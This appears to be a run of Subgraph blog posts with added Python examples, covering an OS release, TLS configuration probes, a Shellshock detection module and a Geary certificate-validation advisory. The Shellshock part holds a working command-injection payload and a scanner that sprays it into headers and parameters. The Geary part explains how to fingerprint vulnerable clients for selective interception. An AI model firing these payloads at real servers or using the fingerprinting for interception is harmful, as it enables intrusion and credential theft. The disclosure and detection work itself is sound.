Subgraph OS December 2016 ISO Availability

A new Subgraph OS Alpha ISO is available for download.

(OnionShare and Ricochet now work out of the box, fully sandboxed)

Download it here!

New features: Alpha release 3

1. ROFLCoptor Tor Control Port Filter and State Tracker Daemon

ROFLCoptor filters Tor control port traffic. It is configured with application-specific security policies to limit what actions may be performed through the control port. ROFLCoptor also includes integration with OZ for dynamic port forwarding capabilities to support fully sandboxed applications that create ephemeral Tor hidden services, such as OnionShare, Ricochet, and Bitcoin core.

2. OnionShare

Subgraph OS now includes OnionShare. OnionShare is an application for sharing files securely and anonymously over the Tor network. OnionShare is fully sandboxed in OZ and has been integrated into the Nautilus file manager (right-click on file to share over OnionShare).

3. Ricochet

Ricochet is an anonymous peer-to-peer instant messenger. It differs from other instant messengers in that, instead of relying on central chat servers, users connect directly to one another over Tor hidden services. Ricochet runs fully sandboxed in OZ.

4. Subgraph OS Handbook

We have included our documentation in the operating system. A shortened version can be read from the desktop (using yelp). The complete documentation (HTML, PDF) can be found in the following directory: /usr/share/sgos-handbook/

Improvements and bug fixes

Our last ISO was released in June. There have been many improvements and fixes since. We'd like to highlight a few major ones.

1. Our Grsecurity kernel has been upgraded to version 4.8.15

Among other improvements, this fixes "Dirty COW" (CVE-2016-5195), a race condition in the kernel's copy-on-write handling that let an unprivileged local user write to read-only private mappings and escalate privileges. We addressed it earlier for users who had already installed Subgraph OS; it is now fixed in the live disc as well.

2. MAC address spoofing has been fixed

For as long as anyone can remember, Linux users have used if-pre-up scripts to spoof the MAC addresses of their network interfaces. Some years ago, changes in NetworkManager broke this. The bug, first reported in 2010, remained unfixed until a couple of years ago, and the fix that eventually landed (running scripts via nm-dispatcher) did not actually allow MAC spoofing; it was only useful for bringing up iptables rules.

Fortunately, a reliable method of spoofing the address at boot was implemented via udev. Recently NetworkManager started adding MAC spoofing techniques of its own. These are not yet fully capable, and in passing they broke the udev technique. This time upstream quickly provided a fix, so our udev-based mechanism works again. It did require a configuration change so that NetworkManager "preserves" the spoofed MAC address rather than resetting the interface to its hardware address when it activates a connection.

3. Audio issues addressed in OZ

We have updated the PulseAudio configuration to correct audio-related issues in sandboxed applications.

4. Application firewall improvements

The application firewall now includes "system" rules, the default rules that ship with Subgraph OS. With this upgrade they are treated differently from user-defined rules, and the firewall settings UI has been updated to reflect this. We have also improved the usability of the firewall settings UI and of the prompt.

5. OZ now includes support for dynamic forwarders

Dynamic forwarders lay the groundwork for running servers inside the OZ sandbox. This is what enables us to support OnionShare, Ricochet, and Bitcoin Core, all of which start Tor hidden services from within the sandbox. Incoming client connections are forwarded into the sandbox.

6. This release addresses the APT signature verification vulnerability

CVE-2016-1252 is now addressed in the live disc. Subgraph OS is distributed only for the x64 architecture, which was not believed to be at risk; this release nonetheless closes the vulnerability completely.

7. Port to gosecco

In this release we have integrated a new Go seccomp-bpf library developed by the ThoughtWorks Tiger team. Gosecco allows us to create more expressive and efficient policies for our sandboxed applications.


We would like to thank everybody for all of your help and feedback during the Alpha. We expect to have a Beta out sometime in 2017. There are some people we'd like to call out specifically:

Follow us on Twitter at @subgraph as well as at this blog for progress updates.

Subgraph OS Announcement

We are happy to announce that Subgraph is to receive support for 12 months of Subgraph OS development from the Open Technology Fund.

This means that we will be able to focus our efforts over the next year on development exclusively.

Our current areas of focus are:

  1. Oz, our framework for application isolation

  2. Tooling and automation for builds and tests of Subgraph OS packages as well as for the base OS image. We are working towards a downloadable ISO as soon as possible.

All of our code is to be hosted on Github, though for now everything there is very alpha. We invite the community to check it out.

We will be posting soon about Oz.

Vega SSL/TLS Configuration Probes: Detecting POODLE and Other Issues

We recently added a feature in Vega: probing HTTPS server configuration settings for issues that have implications for user and application security.

Vega now attempts to detect and will alert on the following issues:

  • SSLv2, SSLv3 (POODLE) support
  • Certificate analysis: SHA-1, MD5, key size
  • Server/client ciphersuite preference
  • Forward secrecy support and prioritization
  • RC4
  • Cipher suite enumeration
  • Identification of weak / export grade cipher suites, anonymous Diffie-Hellman
  • TLS compression (susceptibility to CRIME attacks)

The probes occur before the crawler is started and will run for every HTTPS server target. Full details on the HTTPS audit will be output to the console after the probes have finished running.
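The analysis side of such a probe is small enough to show in full. The following Python is an added example, not Vega's code (Vega is written in Java and its probes are part of the scanner itself). It classifies OpenSSL cipher-suite names into the findings listed above, reads the signature algorithm directly out of a DER-encoded certificate, and wraps a live probe around Python's ssl module. The tag names, function names and the sample DER blob are this example's own; the OIDs are the standard ones.

```python
# Added example, not Vega's code: cipher-suite classification, the leaf
# certificate's signature algorithm read from DER, and a live probe built on
# Python's ssl module. Tag names, function names and SAMPLE_DER are assumptions.
import socket
import ssl


def classify_cipher(name):
    """Tag an OpenSSL cipher-suite name with the findings the probe reports."""
    n = name.upper()
    tags = set()
    if n.startswith("EXP"):                            # 40/56-bit export grade
        tags.add("export")
    if "RC4" in n:
        tags.add("rc4")
    if n.startswith(("ADH", "AECDH")):                 # anonymous Diffie-Hellman
        tags.add("anonymous-dh")
    if n.endswith("-MD5"):
        tags.add("md5-mac")
    if n.startswith(("ECDHE", "DHE", "EDH", "TLS_")):  # TLS_ prefix: TLS 1.3 suites
        tags.add("forward-secrecy")
    return tags


def _der_tlv(buf, pos):
    """Decode one DER tag-length-value at pos -> (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                  # long form: next n bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def _decode_oid(raw):
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


SIGNATURE_OIDS = {
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
    "1.2.840.10045.4.1": "ecdsa-with-SHA1",
    "1.2.840.10045.4.3.2": "ecdsa-with-SHA256",
}


def signature_algorithm(der_cert):
    """Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signature }:
    skip the first element and read the OID inside the second."""
    _, cert, _ = _der_tlv(der_cert, 0)
    _, _, after_tbs = _der_tlv(cert, 0)
    _, alg, _ = _der_tlv(cert, after_tbs)
    _, oid, _ = _der_tlv(alg, 0)
    dotted = _decode_oid(oid)
    return SIGNATURE_OIDS.get(dotted, dotted)


def weak_signature(der_cert):
    name = signature_algorithm(der_cert).lower()
    return "md5" in name or "sha1" in name


# Constructed, structurally valid but meaningless certificate: empty
# tbsCertificate, sha1WithRSAEncryption as the algorithm, a one-byte signature.
SAMPLE_DER = bytes.fromhex("3015" "3000" "300d06092a864886f70d0101050500" "03020000")


def _handshake(host, port, timeout, minimum=None, maximum=None, ciphers=None):
    """One handshake under the given constraints; None if the server refuses
    it or the local OpenSSL cannot even offer it."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname, ctx.verify_mode = False, ssl.CERT_NONE   # auditing, not trusting
    ctx.options &= ~ssl.OP_NO_COMPRESSION            # let TLS compression show if offered
    try:
        if minimum is not None:
            ctx.minimum_version = minimum
        if maximum is not None:
            ctx.maximum_version = maximum
        if ciphers:
            ctx.set_ciphers(ciphers)
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return {"version": tls.version(), "cipher": tls.cipher()[0],
                        "compression": tls.compression(),
                        "cert": tls.getpeercert(binary_form=True)}
    except (OSError, ValueError, ssl.SSLError):
        return None


def probe(host, port=443, timeout=5):
    """Live probe (needs network): protocol versions, compression, weak suites,
    server cipher preference and the leaf certificate's signature algorithm."""
    report = {"protocols": {}, "weak_suites": [], "compression": None,
              "server_preference": None, "signature_algorithm": None}
    for name in ("SSLv3", "TLSv1", "TLSv1_1", "TLSv1_2", "TLSv1_3"):
        v = getattr(ssl.TLSVersion, name)
        report["protocols"][name] = _handshake(host, port, timeout, v, v) is not None
    for suite in ("EXP-RC4-MD5", "RC4-SHA", "ADH-AES128-SHA", "NULL-SHA"):
        if _handshake(host, port, timeout, ciphers=suite + ":@SECLEVEL=0"):
            report["weak_suites"].append((suite, sorted(classify_cipher(suite))))
    base = _handshake(host, port, timeout, maximum=ssl.TLSVersion.TLSv1_2)
    if base:
        report["compression"] = base["compression"]
        report["signature_algorithm"] = signature_algorithm(base["cert"])
        # Offer the negotiated suite last; if the server still picks it, the server's order wins.
        moved = _handshake(host, port, timeout, maximum=ssl.TLSVersion.TLSv1_2,
                           ciphers=f"ALL:-{base['cipher']}:{base['cipher']}")
        if moved:
            report["server_preference"] = moved["cipher"] == base["cipher"]
    return report
```

Two caveats a practitioner should keep in mind. The live part can only offer what the local OpenSSL build supports: modern builds compile out SSLv2, SSLv3 and the export suites entirely, so those rows come back "not supported" whether or not the server would accept them, which is one reason a dedicated scanner carries its own TLS stack. And the server-preference test is only meaningful when the client and server share more than one suite; with a single common suite both orderings yield the same answer.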

This is still a work in progress, so consider it a beta release. The Vega HTTPS server configuration probing will be more comprehensive, reliable, and configurable in the future.

Download a new build from our website to try it out.

Vega HTTPS Config Probes

Vega HTTPS Config Probes Details

Subgraph Vega module for Bash Environment Variable OS Command Injection Vulnerability (CVE-2014-6271)

Today, a critical and trivially remotely exploitable vulnerability was announced in bash. To help users of our Vega web application scanner identify it, we have released a basic standalone module that detects this vulnerability in web applications.

The module works by injecting test cases into certain HTTP header values as well as into any web application form/query parameters. This should be adequate to detect the vulnerability in CGI setups, where HTTP header values are turned into bash environment variables, and also in cases where user-supplied input is passed through functions that spawn subshells, such as system(), exec() and popen(), in various languages. We will refine the module as more information becomes available and we are able to test it further.
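As an added illustration of that injection strategy, here is a stand-alone probe in Python. It is not the Vega module (which is JavaScript written against Vega's module API); it only reproduces the approach described above. The header list, the marker format, the arithmetic trick used to tell execution from reflection, and the scan() helper are this example's own choices.

```python
# Added example, not Vega's module: a stand-alone probe for CVE-2014-6271 that
# injects a marker-echoing test case into the headers a CGI gateway exports as
# environment variables and into each query/form parameter, then looks for the
# marker in the response. Header list, marker format and scan() are assumptions.
import http.client
import secrets
import urllib.parse

INJECT_HEADERS = ("User-Agent", "Referer", "Cookie", "Accept", "Accept-Language")


def shellshock_payload(marker):
    """Bash function-definition prefix followed by a trailing command, which
    vulnerable bash executed while importing the variable. The bare 'echo'
    produces the blank line CGI needs between headers and body, so the marker
    lands in the body rather than being swallowed as a malformed header."""
    return f"() {{ :;}}; echo; echo {marker}$((0)){marker}"


def expected_output(marker):
    """What a vulnerable server prints. $((0)) only becomes '0' if bash ran the
    payload, so a server that merely reflects our input does not match."""
    return f"{marker}0{marker}"


def marker_found(body, marker):
    return expected_output(marker) in body


def build_cases(url, marker, params=()):
    """Yield (method, path, headers, body, injection_point) test cases: one per
    header and one GET plus one POST per parameter. Each request carries a
    single injection point so that a hit can be attributed."""
    u = urllib.parse.urlsplit(url)
    path = u.path or "/"
    payload = shellshock_payload(marker)
    for header in INJECT_HEADERS:
        yield ("GET", path + (f"?{u.query}" if u.query else ""), {header: payload},
               None, f"header:{header}")
    base = dict(urllib.parse.parse_qsl(u.query, keep_blank_values=True))
    for name in list(base) + [p for p in params if p not in base]:
        q = dict(base, **{name: payload})
        yield "GET", f"{path}?{urllib.parse.urlencode(q)}", {}, None, f"param:{name}"
        yield ("POST", path, {"Content-Type": "application/x-www-form-urlencoded"},
               urllib.parse.urlencode(q), f"param:{name}")


def scan(url, params=(), timeout=10):
    """Run every test case against the target (needs network). Returns the
    (method, path, injection_point) triples whose response carried the marker."""
    u = urllib.parse.urlsplit(url)
    connect = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    marker = "vega" + secrets.token_hex(6)          # fresh per scan, so no cached page can match
    hits = []
    for method, path, headers, body, point in build_cases(url, marker, params):
        conn = connect(u.hostname, u.port, timeout=timeout)
        try:
            conn.request(method, path, body=body, headers=headers)
            text = conn.getresponse().read().decode("latin-1", "replace")
        except OSError:
            continue
        finally:
            conn.close()
        if marker_found(text, marker):
            hits.append((method, path, point))
    return hits
```

This only finds the case where the injected command's output reaches the HTTP response. A target that executes the payload but discards its output (a CGI script that runs bash for a side effect, say) needs a blind check instead, such as timing a sleep or watching for a callback to a host you control.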

This module is a good example of how quickly proofs-of-concept can be created in JavaScript with the Vega module API.

The module can be obtained here. It can be installed simply by adding it to the ‘vega/scripts/scanner/modules/injection/’ directory.

If you are not a Vega user, you can download it here or build it from source. We will soon bundle this module into our release tarball.

Due to the seriousness of this vulnerability, we also strongly advise everybody to install patches immediately.

Security vulnerability in Geary: Invalid server certificates accepted silently

Geary is a nice looking mail client for Linux / Gnome users.

We identified a vulnerability in Geary during some recent testing related to Subgraph OS, Mail and Nyms. Thankfully the maintainer responded to our report really quickly and there has already been a patch committed and backported. There are updated tarballs on the Geary homepage and hopefully distro upgrades will be available soon.

Here are the details on CVE-2014-5444:

When Geary connects to any server endpoint over SSL/TLS (IMAPS, SMTPS, IMAP + STARTTLS, SMTP + STARTTLS), it doesn’t act on certificate validation errors, which are detected but ignored. Further, the user is not even made aware when certificate validation fails except when Geary is run with optional debug output via the -d command-line switch.

In all validation failure cases the user credentials are transmitted to the server. This creates an effective attack to harvest user email passwords through active interception.

Geary is fairly identifiable on the wire, meaning that an adversary in a position to perform the attack can do so selectively, reducing the likelihood of detection if another, non-vulnerable mail client is intercepted.

One way to fingerprint Geary is to observe the IMAP IDLE refresh frequency, which occurs every 30 seconds. This is unusually short compared to the maximum IDLE limit of 30 minutes and the default behavior of other clients (Evolution: 10 minutes, Thunderbird: 10 minutes, Claws Mail: 5 minutes).
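The cadence check is simple to automate. What follows is an added example, not part of the original advisory: a detector that groups IMAP IDLE commands by connection and compares their median spacing with the per-client periods stated above. The log format, the function names and the 15% tolerance are this example's assumptions; the sample log is constructed.

```python
# Added example, not from the advisory: fingerprints mail clients by the period
# of their IMAP IDLE re-issues, run over a constructed connection log. The log
# format, function names and the 15% tolerance are assumptions; the per-client
# periods are those stated in the post.
import re
import statistics

# Seconds between successive IDLE commands, per client, as given in the post.
KNOWN_IDLE_PERIODS = {"Geary": 30, "Claws Mail": 300, "Evolution": 600, "Thunderbird": 600}

# Constructed log, "HH:MM:SS.mmm <conn> C>|S> <data>" in time order. Connection
# c1 re-issues IDLE about every 30 s, c2 every 10 min.
SAMPLE_LOG = """\
10:00:00.000 c1 C> a001 IDLE
10:00:00.000 c2 C> b001 IDLE
10:00:00.048 c1 S> + idling
10:00:29.950 c1 C> DONE
10:00:29.990 c1 S> a001 OK Idle completed
10:00:30.000 c1 C> a002 IDLE
10:01:00.100 c1 C> a003 IDLE
10:01:29.900 c1 C> a004 IDLE
10:10:00.000 c2 C> b002 IDLE
10:20:00.000 c2 C> b003 IDLE
"""

LINE = re.compile(r"^(\d\d):(\d\d):(\d\d(?:\.\d+)?) (\S+) ([CS])> (.*)$")
IDLE = re.compile(r"^\S+ IDLE$", re.IGNORECASE)     # "<tag> IDLE" from the client


def idle_timestamps(lines):
    """Map connection id -> timestamps (seconds since midnight) of its IDLE commands."""
    per_conn = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        h, mi, s, conn, direction, data = m.groups()
        if direction == "C" and IDLE.match(data):
            per_conn.setdefault(conn, []).append(int(h) * 3600 + int(mi) * 60 + float(s))
    return per_conn


def fingerprint(timestamps, tolerance=0.15):
    """Median gap between IDLE commands and the clients whose known period it
    matches: (period, [names]). None when there are too few samples to judge."""
    if len(timestamps) < 3:
        return None
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    period = round(statistics.median(gaps), 1)
    matches = sorted(c for c, p in KNOWN_IDLE_PERIODS.items() if abs(period - p) <= tolerance * p)
    return period, matches


def geary_connections(lines):
    """Connection ids whose IDLE cadence matches Geary's 30-second refresh."""
    out = []
    for conn, ts in idle_timestamps(lines).items():
        fp = fingerprint(sorted(ts))
        if fp and "Geary" in fp[1]:
            out.append(conn)
    return sorted(out)


if __name__ == "__main__":
    for conn, ts in idle_timestamps(SAMPLE_LOG.splitlines()).items():
        print(conn, fingerprint(sorted(ts)))
```

On an encrypted link the commands themselves are not visible, but the same periodicity is: a short client-to-server record every 30 seconds on an IMAPS connection gives the interceptor the same signal, which is why an attacker can choose to intercept only the clients known to accept an invalid certificate.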

If exploited, an interception attack would not be perceptible to most users.

Here’s the problematic code, take note of the TODO in engine/api/geary-endpoint.vala:

    private bool report_tls_warnings(string cx_type, TlsCertificateFlags warnings) {
        // TODO: Report or verify flags with user, but for now merely log for informational/debugging
        // reasons and accede
        message("%s TLS warnings connecting to %s: %Xh (%s)", cx_type, to_string(), warnings,
            tls_flags_to_string(warnings));

        return true;
    }

It turns out that this is not an issue unknown to the developers, there is an open ticket that goes as far back as 2012. Our report prompted them to prioritize a fix. Big thank you to Geary developer Jim Nelson for acknowledging that this is a serious vulnerability for Geary users, some of whom are exposed to a high risk of active network interference.